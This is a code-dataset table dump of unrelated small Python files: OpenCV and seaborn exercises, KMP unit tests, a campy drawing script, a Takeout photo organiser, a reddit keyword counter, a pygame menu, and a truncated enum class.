blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
f1405eb730a5ff797a58c5d1fd26daf52c564666 | Python | duypham9895/python-cv2-basic | /Chapter_1.py | UTF-8 | 642 | 3.15625 | 3 | [] | no_license | # Read (Image - Video - Webcam)
import cv2
print("Package imported")
# Read image
# img = cv2.imread("Resources/image-1.jpg")
# cv2.imshow("Output 0: ", img)
# cv2.waitKey(0)
# Read video
# cap = cv2.VideoCapture("Resources/cafe.mp4")
# while True:
# success, img = cap.read()
# cv2.imshow("Video", img)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
# Read camera
# Open the default webcam (device index 0).
cap = cv2.VideoCapture(0)
# OpenCV capture property ids: 3 = frame width, 4 = frame height, 10 = brightness.
cap.set(3, 640)
cap.set(4, 480)
cap.set(10, -100000)
# Show frames until 'q' is pressed or the camera stops delivering frames.
while True:
    success, img = cap.read()
    if not success:
        # Camera unplugged or frame grab failed; the original passed the
        # invalid frame straight to imshow, which raises an error.
        break
    cv2.imshow("Video", img)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
# Release the camera handle and close the preview window (the original
# leaked the capture device on exit).
cap.release()
cv2.destroyAllWindows()
6f240e69a0560b8ab8c21de126921145d7176f61 | Python | TheoLoza/the-sandbox | /ds-python-utd/notes/18_CategoricalPlots.py | UTF-8 | 959 | 2.953125 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
# Load seaborn's bundled "tips" example dataset (restaurant bill/tip records).
tips = sns.load_dataset('tips')
df = pd.DataFrame(tips)
# print(df)
# Subset: only the Thursday rows.
df2 = df[df['day'] == 'Thur']
# print(df2)
#df2.to_csv('Tips_Thurs.csv', index=False)
# group by action
# aggregate categorical data by some function default mean
# estimator: aggregate function
#sns.barplot(x='sex', y='total_bill', data=tips)
# plt.show()
#sns.barplot(x='sex', y='total_bill', data=tips, estimator=np.std)
# plt.show()
# y-axis is already chosen for us
#sns.countplot(x='sex', data=tips)
# plt.show()
#sns.countplot(x='sex', data=tips, hue='smoker')
# plt.show()
# Box plot of total bill grouped by day; this is the only plot actually shown.
sns.boxplot(x="day", y="total_bill", data=tips, palette='rainbow')
plt.show()
#sns.boxplot(x="day", y="total_bill", hue="smoker", data=tips, palette="coolwarm")
# plt.show()
#sns.violinplot(x="day", y="total_bill", data=tips, palette='rainbow')
# plt.show()
#Ref: www.pieriandata.com
| true |
a1b6bfdcbbdb6c48fdf0dd9a9b956bfc7e992732 | Python | Arshad520786/28.-Implement-strStr | /KMPunittest.py | UTF-8 | 1,132 | 3.109375 | 3 | [] | no_license | import unittest
from KMPalgorithm import Solution
class RemoveDuplicatesfromSortedArrayTest(unittest.TestCase):
    """Unit tests for Solution.FailureFunction (the KMP prefix/failure table)."""

    def _check(self, needle, expected):
        # Shared helper: build a fresh Solution and compare its failure table.
        self.assertEqual(Solution().FailureFunction(needle), expected)

    def test_basic_function(self):
        self._check("abcdefg", [0, 0, 0, 0, 0, 0, 0])

    def test_basic_function2(self):
        self._check("abcabc", [0, 0, 0, 1, 2, 3])

    def test_basic_function3(self):
        self._check("abababac", [0, 0, 1, 2, 3, 4, 5, 0])

    def test_basic_function4(self):
        self._check("AABAACAABAA", [0, 1, 0, 1, 2, 0, 1, 2, 3, 4, 5])

    def test_basic_issip(self):
        self._check("issip", [0, 0, 0, 1, 0])


if __name__ == "__main__":
    unittest.main()
| true |
ecaca06e02874cc0fb168ff441c950b11a1c3b73 | Python | pollyhsia/pythonDataScience_hw | /HW2_class4_functionForSd.py | UTF-8 | 297 | 3.1875 | 3 | [] | no_license | import statistics
import math
def my_sd_function(ls):
    """Return the sample standard deviation of *ls* (divides by n - 1).

    *ls* must contain at least two values, otherwise the division below
    raises ZeroDivisionError.
    """
    # Hoisted out of the loop: the original recomputed statistics.mean(ls)
    # for every element, making the function O(n^2).
    m = statistics.mean(ls)
    sq = 0
    for i in ls:
        sq += (i - m) ** 2
    return math.sqrt(sq / (len(ls) - 1))


my_list = [1, 2, 3]
my_list2 = range(1, 11)
my_list3 = range(1, 101)
print(my_sd_function(my_list3))
| true |
bdb04d6b230bcc4fcd28a3256145ddc335e90bb6 | Python | kevinfang418/sc-projects | /SC101_Assignment1/draw_line.py | UTF-8 | 1,479 | 3.8125 | 4 | [
"MIT"
] | permissive | """
File: draw_line.py
Name: Kevin Fang
-------------------------
TODO:
"""
from campy.graphics.gobjects import GOval, GLine
from campy.graphics.gwindow import GWindow
from campy.gui.events.mouse import onmouseclicked
# Assign window as constant to create canvas
# Canvas the circles/lines are drawn on.
window = GWindow()
# Diameter (pixels) of the first-click marker circle.
SIZE = 10
# a, b: coordinates of the most recent click; c, d: coordinates of the
# pending first click, with (0, 0) meaning "no first click recorded yet".
a = b = c = d = 0
def main():
    """
    This program creates lines on an instance of GWindow class.
    There is a circle indicating the user’s first click. A line appears
    at the condition where the circle disappears as the user clicks
    on the canvas for the second time.
    """
    # Register set_point as the handler for every mouse click on the canvas.
    onmouseclicked(set_point)
def set_point(event):
    """Mouse-click handler: the first click drops a hollow marker circle,
    the second click replaces that circle with a line between both clicks.
    """
    # a, b hold the current click; c, d remember the pending first click
    # ((0, 0) is the "no first click yet" sentinel).
    global a, b, c, d
    a = event.x
    b = event.y
    # Whatever object (if any) sits at the remembered first-click position.
    maybe_circle = window.get_object_at(c, d)
    if c == 0 and d == 0:
        # No pending first click: drop a hollow marker centred on the click.
        point = GOval(SIZE, SIZE, x=a-SIZE/2, y=b-SIZE/2)
        point.filled = False
        window.add(point)
        c = a
        d = b
    elif maybe_circle is not None:
        # Second click: draw the line and clear the marker. The original
        # condition `c != d != 0` wrongly failed whenever the first click
        # had equal x and y coordinates; reaching this branch already
        # guarantees (c, d) != (0, 0).
        line = GLine(c, d, a, b)
        window.add(line)
        window.remove(maybe_circle)
        c = 0
        d = 0
if __name__ == "__main__":
    main()  # register the click handler only when run as a script
| true |
79ef7eb2a1fbf4183c1ec42490b720dfc1feb256 | Python | basantpatidar/pythonBasics | /helloWorld.py | UTF-8 | 469 | 3.765625 | 4 | [] | no_license | print('Hello World!')
# Arithmetic expressions are evaluated before printing.
print(5 + 6)
print(7*2)
# An empty print() emits a blank line.
print()
print('End')
print("It's easy")
print("Hello 'Basant'")
# String concatenation with + inserts no space.
print("Hello" + "Patidar")
Greetings = "Hello"
Name = "Basant"
#line prints Name and Greeting
print(Greetings + Name)
print(Greetings +" "+ Name)
# input() always returns a string.
school = input('Enter you school name ')
print(Name +"'s school's name is "+school)
# \n inside a literal starts a new line in the output.
spliteString = "String is splited\n in namy \n parts"
print(spliteString)
# \t inserts tab stops between the fields.
tabFunction = "1\t2\t3\t4\tBasant"
print (tabFunction)
| true |
6b426d6d9dd5918a57df2e247d68142742bd338f | Python | Pochemu/Activity | /Щелчок/8795106/6.py | UTF-8 | 58 | 2.78125 | 3 | [] | no_license | s = 0
# Accumulate the multiples of 3 from 3 up to 30 and print the total (165).
s = 0
k = 0
for _ in range(10):
    k += 3
    s += k
print(s)
| true |
f15038bc0bd4497509cb98e8ffb541d56b58a980 | Python | HillYang/PythonExercises | /VSCodeProjects/HelloVSCode/二 算法分析/dict_list_compare.py | UTF-8 | 382 | 2.671875 | 3 | [] | no_license | import timeit
import random
# Benchmark membership tests: list (O(n) linear scan) vs dict (O(1) hash lookup).
print("Number list_time dict_time")
for i in range (10000,100001,10000):
    # Times `random.randrange(i) in x` 1000 times, where x is looked up in
    # __main__ at run time (so rebinding x below changes what is measured).
    time = timeit.Timer("random.randrange(%d) in x" %i, "from __main__ import random, x")
    x = list(range(i))
    list_time = time.timeit(number=1000)
    # Rebind x to a dict with the same keys: membership now hashes instead of scanning.
    x = {j:None for j in range(i)}
    dict_time = time.timeit(number=1000)
    print("%d %f %f" % (i, list_time, dict_time))
d9c89f230afd3e6b9415787c114ee3c96f92be0d | Python | phrodrigue/URI-problems | /iniciante/2139/main.py | UTF-8 | 394 | 3.53125 | 4 | [] | no_license | meses = [31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 25]
# Read "month day" pairs from stdin until EOF and report the number of days
# remaining until Christmas (the month table ends on December 25th).
while True:
    try:
        m, d = [int(x) for x in input().split()]
        # Convert the 1-based month to a 0-based index into `meses`.
        m -= 1
    except EOFError:
        break
    # Days left in the current month plus all days of the following months.
    dias = (meses[m] - d) + sum(meses[m + 1:])
    if dias < 0:
        print("Ja passou!")
    elif dias == 0:
        print("E natal!")
    elif dias ==1:
        print("E vespera de natal!")
    else:
        print(f"Faltam {dias} dias para o natal!")
| true |
a47b2096a818b0d55b7e797182de87582654b6ee | Python | CarlosCruzy/literate-enigma | /eceptions.py | UTF-8 | 130 | 3.0625 | 3 | [] | no_license | try:
    # Prompt for an age; int() raises ValueError on non-numeric input.
    a=int(input("Ingrese una edad"))
except:
    # NOTE(review): a bare `except` also swallows SystemExit/KeyboardInterrupt;
    # `except ValueError` would be the targeted handler here.
    print("Ingrese un valor valido")
finally:
    # Runs whether or not the conversion succeeded.
    print("adios")
exit()
a4ff93510f6a261ea2b2a8e2acd1411b3e505599 | Python | atlantageek/HelpingSantasHelpers | /SantasHelperSolutionDynamicProgramming.py | UTF-8 | 539 | 2.78125 | 3 | [] | no_license | import sys
import random
from SantasHelperSolution import *
class SantasHelperSolutionDynamicProgramming(SantasHelperSolution):
    """Assigns work by handing a randomly chosen toy to the next elf that
    becomes available, until no toys remain."""

    def run(self):
        while self.toys:
            start_time, elf = self.next_available_elf()
            # Pick and remove a random toy (same random-call sequence as before).
            pick = random.randint(0, len(self.toys) - 1)
            toy = self.toys.pop(pick)
            self.record_work(elf, toy)
# CLI arguments: <input_file> <output_file> <num_elves>
input_file = sys.argv[1]
output_file = sys.argv[2]
num_elves = int(sys.argv[3])
solution = SantasHelperSolutionDynamicProgramming(input_file, output_file, num_elves)
# NOTE(review): process() comes from the SantasHelperSolution base class —
# presumably it drives run(); confirm in SantasHelperSolution.
solution.process()
| true |
63cc023fdc4b96ae1cf61b513f230e8ac0f9481b | Python | AnaRitaTorres/RVAU | /Proj2-MapasAumentados/src/core/database.py | UTF-8 | 6,429 | 3 | 3 | [] | no_license | import pickle
import os.path
import shutil
from core.utils import *
from core.detector import *
# Pickle file holding the list of MapEntry objects.
database_name = 'maps.db'
# Windows-style folder where POI images are copied.
points_path = 'POIs\\'
# Represents a Point of Interest. Initialize with point coordinates (x and y), name given by user and array of images
class PointOfInterest:
    """A named point on a map image, with optional attached images."""

    def __init__(self, position_x, position_y, name, images):
        # Pixel coordinates of the point on the map image.
        self.position_x = position_x
        self.position_y = position_y
        # User-supplied label for the point.
        self.name = name
        # List of image file paths attached to this point.
        self.images = images
# Represents an Image. Initialize with filename, features and points of interest as arguments
class Image:
    """One image of a map: its file, detected features, and POIs."""

    def __init__(self, filename, features, points):
        # Path of the image file.
        self.filename = filename
        # Serialized SIFT features for this image.
        self.features = features
        # PointOfInterest objects placed on this image.
        self.points = points
# Represents a Map. Initialize with name of the entry, map scale and filename of the frontal image
# Also associated to a set of one or more images
class MapEntry:
    """A stored map: its name, scale, frontal image, and all image variants."""

    def __init__(self, name, scale, frontal_image, images):
        # User-chosen name of the database entry.
        self.name = name
        # Map scale value supplied by the user.
        self.scale = scale
        # Filename of the frontal (base) image among `images`.
        self.frontal_image = frontal_image
        # List of Image objects belonging to this map.
        self.images = images
# Returns a list with the names of the maps currently stored in database
def get_map_names(maps):
    """Return the names of the maps currently stored in the database."""
    return [entry.name for entry in maps]
# Returns map information from the database given a map name and a set of maps
def get_map(map_name, maps):
    """Return the map entry named *map_name* from *maps*, or None if absent."""
    return next((entry for entry in maps if entry.name == map_name), None)
# Get base image information
def get_base_image(map_entry):
    """Return the Image whose filename is the map's frontal image (None if missing)."""
    return next((img for img in map_entry.images
                 if img.filename == map_entry.frontal_image), None)
# Loads database if it exists and prints their contents
def load_database(test):
    """Load and return the list of MapEntry objects from the pickle database.

    Returns an empty list when the database file does not exist yet.
    When *test* is truthy, progress messages are printed.
    """
    empty_map = []
    # Check if database exists
    if not os.path.isfile(database_name):
        if test:
            print("\nDatabase doesn't yet exist.\n")
        return empty_map
    infile = open(database_name, 'rb')
    maps = pickle.load(infile)
    infile.close()
    if test and maps:
        print("\nSuccessfully loaded database!\n")
    # Dead debug dump kept below as an (unused) string literal.
    '''
    for map_entry in maps:
        print('\nMap name:', map_entry.name)
        print('\nMap scale:', map_entry.scale)
        print('\nFrontal image of map:', map_entry.frontal_image)
        for img in map_entry.images:
            print('\nImage name:', img.filename)
            features = deserialize_features(img.features)
            print('Deserialized features:', len(features['k']), len(features['d']), 'points')
            for poi in img.points:
                print('Point of Interest:', poi.position_x, poi.position_y, poi.name, poi.images)
    print('\n')
    '''
    return maps
# Check if database exists and update its contents if it exists
def update_database(entry_name, map_scale, filename, images, test):
    """Merge a map entry into the stored map list and return the full list.

    If the database file does not exist yet, the result holds only the new
    entry. If an entry with the same name is already stored, only its image
    list is refreshed; otherwise the new entry is appended.
    """
    # Entry representing the map being saved right now.
    map_entry = MapEntry(entry_name, map_scale, filename, images)

    if not os.path.isfile(database_name):
        # No database yet: the new entry is the whole map list.
        if test:
            print("Added map entry to database")
        return [map_entry]

    # `with` guarantees the handle is closed; the original leaked the
    # open file object (opened it and never called close()).
    with open(database_name, 'rb') as infile:
        maps_loaded = pickle.load(infile)

    # Refresh every stored entry with a matching name (same as the original,
    # which updated all matches, not just the first).
    map_exists = False
    for stored in maps_loaded:
        if stored.name == entry_name:
            if test:
                print("Found equal map on the database. Will update its contents")
            map_exists = True
            stored.images = images

    if not map_exists:
        if test:
            print("Added map entry to database")
        maps_loaded.append(map_entry)

    return maps_loaded
# Saves map to database
def save_database(entry_name, map_scale, filename, more_images, features, pois, test):
    """Persist a map entry (base image, extra images, and POIs) to the database."""
    # Copy POI images into the POIs folder and get POIs with updated paths.
    points = setup_pois(pois, test)

    if test:
        print('Saving map', entry_name, 'to database...')

    images = []
    for img_filename in more_images:
        if test:
            print("Detecting features on additional images of the map.")
        # Run SIFT on each additional map image; extra images carry no POIs.
        results = runSIFT(img_filename, test)
        images.append(Image(img_filename, results['pts_features'], []))

    # The base (frontal) image keeps the precomputed features and the POIs.
    images.append(Image(filename, features, points))

    maps = update_database(entry_name, map_scale, filename, images, test)

    # `with` closes the file even if pickling fails (the original relied on
    # a manual close() call).
    with open(database_name, mode='wb') as binary_file:
        pickle.dump(maps, binary_file)
# Copies each POI's images to the appropriate folder, then returns all POIs
def setup_pois(pois, test):
    """Copy each POI's images into the POIs folder and return the updated POIs."""
    # exist_ok avoids the check-then-create race of the original
    # `if not exists: makedirs` sequence.
    os.makedirs(points_path, exist_ok=True)

    # Rewrite each point of interest so its image paths point into the POIs folder.
    new_points = [copy_images(poi, test) for poi in pois]

    if test:
        print('Copied all POI images to new folder')
    return new_points
# Parses images from a PointOfInterest object and copies them to a new folder
def copy_images(poi, test):
    """Copy every image attached to *poi* into the POIs folder, rewrite the
    POI's image paths in place, and return the (mutated) POI."""
    poi.images = [copy_file(img, test) for img in poi.images]
    return poi
# Copy image to Points of Interests folder
def copy_file(filename, test):
    """Copy *filename* into the POIs folder.

    Returns the new path, or the original path when the file already
    lives in the POIs folder.
    """
    try:
        return shutil.copy(filename, points_path)
    except shutil.SameFileError:
        if test:
            print("Image already exists in POIs folder")
        return filename
| true |
6271bc990d812d792110c4759335693f0c422516 | Python | hexdump/takeout-google-photos-export | /photos.py | UTF-8 | 9,051 | 2.765625 | 3 | [] | no_license | #!/usr/bin/env python3
#
# [photos.py]
#
# Google Photos Takeout organization tool.
# Copyright (C) 2020, Liam Schumm
#
# for command-line interface
import click
# for handling filesystem paths
from pathlib import Path
# for image conversion and hashing
from PIL import Image as PILImage
# for detecting what is and isn't a photo
from PIL import UnidentifiedImageError
# so we can dispatch to exiftool for
# TIFF manipulation
from subprocess import check_call, PIPE, CalledProcessError, DEVNULL
# so we can manipulate created/modified times
# for importing
from os import utime
# for hashing files
from hashlib import sha256
# for parsing Google's non-standard "formatted" timestamps
from dateutil.parser import parse as parse_date
from json import loads as parse_json
# for handling HEIC files
from pyheif import read as read_heic
# for exiting on error
from sys import exit
# for a progress bar
from tqdm import tqdm
# to copy files
from shutil import copy
LOG = ""  # accumulated warning/error messages, printed once at the end of main()
def log(message):
    """Append *message* plus a newline to the global LOG buffer."""
    global LOG
    LOG += message + "\n"
class Timestamp:
    """Taken / created / modified times parsed from Takeout JSON metadata."""

    def __init__(self, taken, created, modified):
        # Each argument is one of Google's "formatted" date strings.
        self.taken = parse_date(taken)
        self.created = parse_date(created)
        self.modified = parse_date(modified)

    def __eq__(self, other):
        if not isinstance(other, Timestamp):
            # Let Python try the reflected comparison instead of the original
            # behaviour of claiming inequality for every foreign type.
            return NotImplemented
        return ((self.taken, self.created, self.modified)
                == (other.taken, other.created, other.modified))
class Location:
    """GPS coordinates read from a photo's EXIF metadata."""

    def __init__(self, latitude, longitude, altitude):
        self.latitude = latitude
        self.longitude = longitude
        self.altitude = altitude

    def __eq__(self, other):
        if not isinstance(other, Location):
            # The original returned False outright; NotImplemented lets
            # Python fall back to the reflected comparison.
            return NotImplemented
        return ((self.latitude, self.longitude, self.altitude)
                == (other.latitude, other.longitude, other.altitude))

    def is_zero(self):
        """True when all three coordinates are 0 (i.e. no GPS fix recorded)."""
        return (self.latitude, self.longitude, self.altitude) == (0, 0, 0)
class Metadatum:
    """One Takeout JSON sidecar: title, timestamps, and GPS for a media file."""

    def __init__(self, path):
        """Parse the Takeout JSON file at *path*.

        Raises ValueError when a required key is missing, so callers can
        skip JSON files that are not photo metadata.
        """
        self.path = path
        with open(path, "r") as f:
            self._data = parse_json(f.read())
        try:
            self.title = self._data["title"]
            self.timestamp = Timestamp(self._data["photoTakenTime"]["formatted"],
                                       self._data["creationTime"]["formatted"],
                                       self._data["modificationTime"]["formatted"])
            self.location = Location(self._data["geoDataExif"]["latitude"],
                                     self._data["geoDataExif"]["longitude"],
                                     self._data["geoDataExif"]["altitude"])
        except KeyError:
            raise ValueError(f"warning: insufficient metadata in JSON file {path}. ignoring...")
class Media:
    """Base class for an importable media file (photo or video)."""

    def __init__(self, path):
        self.path = path
        self.title = self.path.name
        # The content hash doubles as a deduplicating target filename.
        with open(self.path, "rb") as f:
            sha = sha256()
            sha.update(f.read())
        self.shasum = sha.hexdigest()
        self.target_filename = self.shasum + self.path.suffix
        # Filled in later from the matching Takeout JSON metadata.
        self.timestamp = None
        self.location = None

    def is_metadata_complete(self):
        """True once both timestamp and location metadata are attached."""
        return (self.timestamp is not None) and (self.location is not None)

    def apply_exif(self, path):
        """Write timestamp/GPS EXIF tags onto *path* via exiftool and sync
        the filesystem timestamps. Raises ValueError if metadata is missing."""
        if not self.is_metadata_complete():
            raise ValueError("metadata incomplete.")
        try:
            command = ["exiftool", path, "-overwrite_original",
                       f"-DateTimeOriginal={self.timestamp.taken}",
                       f"-CreateDate={self.timestamp.created}",
                       f"-ModifyDate={self.timestamp.modified}"]
            if not self.location.is_zero():
                # exiftool tag assignments use '-TAG=VALUE'; the original
                # passed '-TAG VALUE' inside one argv element, which exiftool
                # does not parse as an assignment.
                command += [f"-GPSLatitude={self.location.latitude}",
                            f"-GPSLongitude={self.location.longitude}",
                            f"-GPSAltitude={self.location.altitude}"]
            check_call(command, stdout=DEVNULL, stderr=DEVNULL)
            # Mirror the metadata times onto the filesystem created/modified times.
            utime(path, (self.timestamp.created.timestamp(),
                         self.timestamp.modified.timestamp()))
        except CalledProcessError as e:
            print(e)
            log(f"error! could not set metadata on {path}!")
            exit(1)

    def save(self, target_directory):
        """Copy the file into *target_directory* under its hash-based name,
        skipping (and logging) content duplicates."""
        target_path = target_directory.joinpath(self.target_filename)
        if target_path.exists():
            log(f"warning: duplicate version of {self.path} detected! ignoring...")
        else:
            copy(self.path, target_path)
class Video(Media):
    def save(self, target_directory):
        """Save the video into *target_directory* as a .mov and tag it.

        MP4 inputs get a lossless container transfer via ffmpeg; MOV inputs
        are copied as-is. Does nothing when metadata is incomplete.
        """
        if self.is_metadata_complete():
            target_path = target_directory.joinpath(self.target_filename).with_suffix(".mov")
            if self.path.suffix.lower() == ".mp4":
                # do a container transfer with no actual conversion.
                try:
                    check_call(["ffmpeg", "-i", self.path, "-c", "copy",
                                "-f", "mov", target_path, "-y"],
                               stdout=DEVNULL, stderr=DEVNULL)
                    # later, we're gonna copy the file at self.path to
                    # self.target_path, so this assignment nullifies that
                    # operation (since we don't want the original, non-MOV).
                    self.path = target_path
                except CalledProcessError as e:
                    print(e)
                    print(f"error! could not transfer container for {self.path}!")
                    exit(1)
            # we shouldn't be allowing this to be initialized
            # with something that isn't caught by now.
            assert self.path.suffix.lower() == ".mov"
            # copy the file over to the new location
            if self.path != target_path:
                copy(self.path, target_path)
            # with open(target_path, "wb") as destination:
            #     with open(self.path, "rb") as source:
            #         destination.write(source.read())
            # set the metadata.
            self.apply_exif(target_path)
class Image(Media):
    def save(self, target_directory):
        """Convert the image to TIFF in *target_directory* and tag its EXIF.

        HEIC files are decoded via pyheif first (Pillow cannot open them);
        everything else is opened with Pillow directly. Skips (and logs)
        content duplicates; does nothing when metadata is incomplete.
        """
        # (stray debug `print(self.path)` removed)
        if self.path.suffix.lower() == ".heic":
            heic = read_heic(self.path)
            source = PILImage.frombytes(
                heic.mode,
                heic.size,
                heic.data,
                "raw",
                heic.mode,
                heic.stride,
            )
        else:
            source = PILImage.open(self.path, "r")
        target_path = target_directory.joinpath(self.shasum + '.tiff')
        if target_path.exists():
            log(f"warning: duplicate version of {self.path} detected! ignoring...")
        elif self.is_metadata_complete():
            source.save(target_path, format='TIFF', quality=100)
            self.apply_exif(target_path)
@click.command()
@click.option("-t", "--takeout-directory", type=Path, required=True, help="Google Takeout directory.")
@click.option("-o", "--output-directory", type=Path, required=True, help="Directory in which to put imported files.")
def main(takeout_directory, output_directory):
    """Scan a Takeout tree, pair media files with their JSON metadata, and
    import the matched files into *output_directory*."""
    metadata = []
    media = []
    for filename in takeout_directory.rglob("*"):
        # Blindly suck in all JSON files as candidate metadata.
        if filename.name.endswith('.json'):
            try:
                metadata.append(Metadatum(filename))
                continue
            except ValueError:
                pass
        if filename.suffix.lower() == ".heic":
            media.append(Image(filename))
            # The original fell through into the PIL branch below and
            # appended every HEIC file a second time; skip to the next file.
            continue
        # Anything Pillow can open is treated as an image.
        try:
            PILImage.open(filename)
            media.append(Image(filename))
            continue
        except UnidentifiedImageError:
            pass
        # Video support is limited to these container formats.
        if filename.suffix.lower() in ['.mp4', '.mov']:
            media.append(Video(filename))
    # Unify metadata and media by title: save matched items, stash the rest
    # in the "spare" folder.
    with tqdm(media) as iterator:
        for item in iterator:
            matched = False
            for metadatum in metadata:
                if item.title == metadatum.title:
                    item.timestamp = metadatum.timestamp
                    item.location = metadatum.location
                    item.save(output_directory)
                    matched = True
            if not matched:
                copy(item.path, "spare")
                log(item.title + " not saved.")
    # Print our accumulated log.
    print(LOG)

if __name__ == "__main__":
    main()
| true |
dbdc0f29bd7a6c8f1f9a80e871e9abb447857568 | Python | Joe2357/Baekjoon | /Python/Code/2900/2908 - 상수.py | UTF-8 | 209 | 3.453125 | 3 | [] | no_license | a, b = input().split()
# Compare the two 3-digit numbers digit-by-digit starting from the last digit:
# this is a lexicographic comparison of the reversed numbers, which equals
# numeric comparison since both reversals have the same digit count.
for i in range(2, -1, -1):
    if a[i] > b[i]:
        # a's reversal is larger: print a's digits back-to-front (no newline).
        for j in range(2, -1, -1):
            print(a[j], end = "")
        break
    elif a[i] < b[i]:
        for j in range(2, -1, -1):
            print(b[j], end = "")
        break
de3e72f486c4b6a783634ab638e5d1a4119e2aa8 | Python | fuboki10/Tower-Defense-Game | /main_menu/main_menu.py | UTF-8 | 1,831 | 3.171875 | 3 | [
"MIT"
] | permissive | import pygame
import os
from game import Game
logo = pygame.image.load(os.path.join("assets", "logo.png"))
start_button = pygame.image.load(os.path.join("assets/menu", "StartButton.png"))
class MainMenu:
    def __init__(self, window, width: int, height: int):
        """
        :param window: surface
        :param width: int
        :param height: int
        """
        self.width = width
        self.height = height
        # Background scaled to fill the whole window.
        self.bg = pygame.image.load(os.path.join("assets", "lvl1.jpg"))
        self.bg = pygame.transform.scale(self.bg, (self.width, self.height))
        self.window = window
        # Start-button hit box: (x, y, width, height), centred horizontally.
        self.button = (self.width/2 - start_button.get_width()/2, 350, start_button.get_width(), start_button.get_height())
        self.running = False

    def run(self):
        """
        Open Main Menu
        :return: None
        """
        self.running = True
        clock = pygame.time.Clock()
        # 60 FPS event/draw loop until running is cleared.
        while self.running:
            clock.tick(60)
            self.draw()
            self.input()
        pygame.quit()

    def draw(self):
        """Blit the background, logo, and start button, then flip the display."""
        self.window.blit(self.bg, (0, 0))
        self.window.blit(logo, (self.width/2 - logo.get_width()/2, 0))
        self.window.blit(start_button, (self.button[0], self.button[1]))
        pygame.display.update()

    def input(self):
        """Handle quit events and clicks inside the start-button hit box."""
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                self.running = False
            if event.type == pygame.MOUSEBUTTONDOWN:
                x, y = pygame.mouse.get_pos()
                if self.button[0] <= x <= self.button[0] + self.button[2]:
                    if self.button[1] <= y <= self.button[1] + self.button[3]:
                        # Start the game; when it returns, its result decides
                        # whether the menu loop keeps running.
                        game = Game(self.window, self.width, self.height)
                        self.running = game.run()
                        del game
| true |
69cd412c9dab79279a6ad7cc0264b0e6e7d5b1b1 | Python | vincent507cpu/Comprehensive-Algorithm-Solution | /LintCode/ladder 02 two pointers/选修/609. Two Sum - Less than or equal to target/solution.py | UTF-8 | 556 | 3.21875 | 3 | [
"MIT"
] | permissive | class Solution:
"""
@param nums: an array of integer
@param target: an integer
@return: an integer
"""
def twoSum5(self, nums, target):
# write your code here
if len(nums) < 2:
return 0
nums.sort()
left, right, res = 0, len(nums) - 1, 0
while left < right:
if nums[left] + nums[right] > target:
right -= 1
else:
res += right - left
left += 1
return res | true |
05006a034f02284a6dfd419aac39faf896f7f100 | Python | Pamex1/ALx-system_engineering-devops-2 | /0x16-api_advanced/100-count.py | UTF-8 | 2,708 | 3.0625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python3
"""script for parsing web data from an api
DISCLAIMER: THIS PROBABLY SHOULDN'T BE DONE RECURSIVELY
but we had to for school :P
"""
import json
import requests
import sys
def get_hot_posts(subreddit, hot_list=None):
    """Recursively page through a subreddit's top posts via the reddit JSON API.

    Returns the accumulated list of post objects (the API's `children`
    entries), or None when the response payload is malformed.
    """
    if hot_list is None:
        # The original used a mutable default argument ([]), which is shared
        # across calls: a second invocation kept appending to the first
        # call's results.
        hot_list = []
    base_url = 'https://www.reddit.com/r/{}/top.json'.format(
        subreddit
    )
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) \
        Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)'
    }
    if len(hot_list) == 0:
        # First page.
        url = base_url
    else:
        # Next pagination after the last object already in hot_list.
        url = base_url + '?after={}_{}'.format(
            hot_list[-1].get('kind'),
            hot_list[-1].get('data').get('id')
        )
    response = requests.get(url, headers=headers)
    resp = json.loads(response.text)
    try:
        data = resp.get('data')
        children = data.get('children')
    except AttributeError:
        # resp or data was not a dict (error payload); the original bare
        # `except:` also swallowed KeyboardInterrupt and genuine bugs.
        return None
    if children is None or data is None or len(children) < 1:
        return hot_list
    hot_list.extend(children)
    return get_hot_posts(subreddit, hot_list)
def count_words(subreddit, wordlist):
    """Print keyword occurrence counts, highest first, over a subreddit's top titles."""
    posts = get_hot_posts(subreddit)
    if posts is None:
        print(end="")
        return
    counts = gather_word_info(posts, wordlist)
    ranked = sorted(counts.items(), key=lambda pair: pair[1], reverse=True)
    for word, total in ranked:
        if total > 0:
            print("{}: {}".format(word, total))
def gather_word_info(hot_posts, wordlist,
                     posts_len=None,
                     counter=0,
                     words_info=None):
    """Recursively tally how often each word in *wordlist* appears in post titles.

    Returns a dict mapping every word to its count (0 when unseen), or None
    when *hot_posts* is None. A malformed post (missing data/title) stops the
    recursion and returns the counts gathered so far, as before.
    """
    if hot_posts is None:
        return
    # Generate defaults on the first (non-recursive) call.
    if posts_len is None:
        posts_len = len(hot_posts)
    if words_info is None:
        words_info = {key: 0 for key in wordlist}
    # Base case: every index processed. The original stopped when
    # counter == posts_len - 1, which skipped the final post and raised
    # IndexError on an empty post list.
    if counter >= posts_len:
        return words_info
    # Parse this title and move to the next post.
    data = hot_posts[counter].get('data')
    if data is None:
        return words_info
    title = data.get('title')
    if title is None:
        return words_info
    for word in title.split(' '):
        word = word.lower()
        if word in wordlist:
            words_info[word] += 1
    return gather_word_info(
        hot_posts, wordlist, posts_len,
        counter + 1, words_info
    )
| true |
c1637a8af6c85ffc8fe58fd1bc06b34a23b384e5 | Python | layoaster/compython | /p7/idclass.py | UTF-8 | 1,464 | 3.015625 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
$Id$
Description: Representacion de los Simbolos No Terminales.
$Author$ Lionel Aster Mena Garcia, Alejandro Samarin Perez, Sergio Armas Perez
$Date$
$Revision$
"""
class WrapCl:
    """Enumeration of identifier-class category constants."""
    ARRAY_TYPE = 0
    CONSTANT = 1
    FIELD = 2
    PROCEDURE = 3
    RECORD_TYPE = 4
    STANDARD_PROC = 5
    STANDARD_TYPE = 6
    VALUE_PARAMETER = 7
